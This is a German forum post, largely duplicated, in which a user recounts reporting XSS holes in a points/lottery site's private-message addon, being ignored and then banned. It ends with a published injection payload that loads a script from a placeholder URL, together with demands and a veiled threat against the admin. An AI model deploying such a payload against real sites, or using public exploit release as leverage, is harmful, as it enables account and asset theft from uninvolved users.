Hallo,
nun, ich möchte hiermit alle Klammer ausdrücklich vor der dubiosen Loseseite: "Besucher-Oase.de" warnen, welche von einem User Namens SonneDeluxe betrieben wird.
Zwischen mir und ihm gab es folgenden Zwischenfall:
Ich hatte ein paar XSS-Lücken auf der Seite entdeckt (ein paar ist gut, die Seite war übersäht damit ) und habe sie ihm unverzüglich per PN gemeldet.
Nicht lange danach torkelte eine komplett in Kleinbuchstaben und ohne Interpunktion verfasste PN (die sehr kompetent wirkte xD) ein, die mir erklärte, er würde sich darum kümmern.
Etwa eine Woche später fragte ich nach(die Lücken wurden offensichtlich noch nicht geschlossen), ich argumentierte, dass es jedem User möglich sei, sämtliche Lose und den Account aller anderen User (einschließlich seinem Admin) durch diverse Lücken zu stehlen, ich schrieb ihm während eines Gespräches sogar einen einfachen Zweizeiler, der das Problem behoben hätte.
Die Antwort: Es würde demnächst ein FWX Update gemacht werden, das dann die Lücken wie er so dachte schließen würde. (Natürlich totaler Schwachsinn, die XSS-Lücken waren/sind in den Addons, am gefährlichsten die im PN-Addon).
Ich lag ihm daraufhin ab und an immer wieder auf den Ohren, ohne Reaktion. Zwischendrin informierte ich in meiner Verzweifelung sogar ein paar Usern, denen ich, auf Anfrage, erfolgreich einen solchen Loseklau demonstrieren konnte, ja ich schrieb sogar einmal die Co-Admine an. Immernoch ohne Gegenmaßnahme auf Lücken.
Ich weiß nicht, wieviele Wochen das ging, zumindest stellte ich Heute fest, dass diese Lücken "gutmütig" und mickrig behoben wurden. (Zur Information: Der intelligente Beheber ist hingegangen und hat " sowie ' maskiert)
Jeder Progger hier wird mir zustimmen, wenn ich sage, dass das einfach nur lächerlich ist und rein gar nichts behebt.
Nun, ich schrieb daraufhin eine sehr "fiese" PN, in der ich den Admin nochmals dazu aufforderte die Lücken zu schließen, seine User seien schließlich fahrlässig un Unkenntnis gelassen und immer in der Gefahr, bald keine Lose mehr zu besitzen.
Sodann kam eine Reaktion: Ich wurde gesperrt: "Verdacht auf Manipulation des Skriptes". Ebenfalls lächerlich, ich kann das Skript gar nicht manipulieren. Lieber Admin, ich kann es höchstens durch eigenen Code erweitern, doch ich habe NIEMALS deiner Seite damit geschadet.
Wenn ich es hätte wollen, würde die Seite wohl nicht mehr existieren.
Also meine Warnung: Haltet euch von solch inkompetenten und fahrlässigen Admins fern, nicht zuletzt auch von der Seite, wenn euch eure Lose lieb sind.
An den Admin,
ich werde hier ein Beispielskript veröffentlichen und dich endgültig dazu zwingen diese Lücken zu beheben, außerdem fordere ich sämtliche Lose von dir zurück, inklusive der in den Anteilen investierten! Ich werde andernfalls andere Wege einschlagen um diese Lose zurückzubekommen.
Achja, das Skriptbeispiel (für Pn's in diesem Fall):
Gruß
Drakor
Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.
nun, ich möchte hiermit alle Klammer ausdrücklich vor der dubiosen Loseseite: "Besucher-Oase.de" warnen, welche von einem User Namens SonneDeluxe betrieben wird.
Zwischen mir und ihm gab es folgenden Zwischenfall:
Ich hatte ein paar XSS-Lücken auf der Seite entdeckt (ein paar ist gut, die Seite war übersäht damit ) und habe sie ihm unverzüglich per PN gemeldet.
Nicht lange danach torkelte eine komplett in Kleinbuchstaben und ohne Interpunktion verfasste PN (die sehr kompetent wirkte xD) ein, die mir erklärte, er würde sich darum kümmern.
Etwa eine Woche später fragte ich nach(die Lücken wurden offensichtlich noch nicht geschlossen), ich argumentierte, dass es jedem User möglich sei, sämtliche Lose und den Account aller anderen User (einschließlich seinem Admin) durch diverse Lücken zu stehlen, ich schrieb ihm während eines Gespräches sogar einen einfachen Zweizeiler, der das Problem behoben hätte.
Die Antwort: Es würde demnächst ein FWX Update gemacht werden, das dann die Lücken wie er so dachte schließen würde. (Natürlich totaler Schwachsinn, die XSS-Lücken waren/sind in den Addons, am gefährlichsten die im PN-Addon).
Ich lag ihm daraufhin ab und an immer wieder auf den Ohren, ohne Reaktion. Zwischendrin informierte ich in meiner Verzweifelung sogar ein paar Usern, denen ich, auf Anfrage, erfolgreich einen solchen Loseklau demonstrieren konnte, ja ich schrieb sogar einmal die Co-Admine an. Immernoch ohne Gegenmaßnahme auf Lücken.
Ich weiß nicht, wieviele Wochen das ging, zumindest stellte ich Heute fest, dass diese Lücken "gutmütig" und mickrig behoben wurden. (Zur Information: Der intelligente Beheber ist hingegangen und hat " sowie ' maskiert)
Jeder Progger hier wird mir zustimmen, wenn ich sage, dass das einfach nur lächerlich ist und rein gar nichts behebt.
Nun, ich schrieb daraufhin eine sehr "fiese" PN, in der ich den Admin nochmals dazu aufforderte die Lücken zu schließen, seine User seien schließlich fahrlässig un Unkenntnis gelassen und immer in der Gefahr, bald keine Lose mehr zu besitzen.
Sodann kam eine Reaktion: Ich wurde gesperrt: "Verdacht auf Manipulation des Skriptes". Ebenfalls lächerlich, ich kann das Skript gar nicht manipulieren. Lieber Admin, ich kann es höchstens durch eigenen Code erweitern, doch ich habe NIEMALS deiner Seite damit geschadet.
Wenn ich es hätte wollen, würde die Seite wohl nicht mehr existieren.
Also meine Warnung: Haltet euch von solch inkompetenten und fahrlässigen Admins fern, nicht zuletzt auch von der Seite, wenn euch eure Lose lieb sind.
An den Admin,
ich werde hier ein Beispielskript veröffentlichen und dich endgültig dazu zwingen diese Lücken zu beheben, außerdem fordere ich sämtliche Lose von dir zurück, inklusive der in den Anteilen investierten! Ich werde andernfalls andere Wege einschlagen um diese Lose zurückzubekommen.
Achja, das Skriptbeispiel (für Pn's in diesem Fall):
</td>/tr><script src=https://deineurl.de/skript.js></script>
Gruß
Drakor
Ps: Eure Meinung würde ich dazu auch ganz gerne einmal hören, ich denke, ich bin im Recht.
Zuletzt bearbeitet: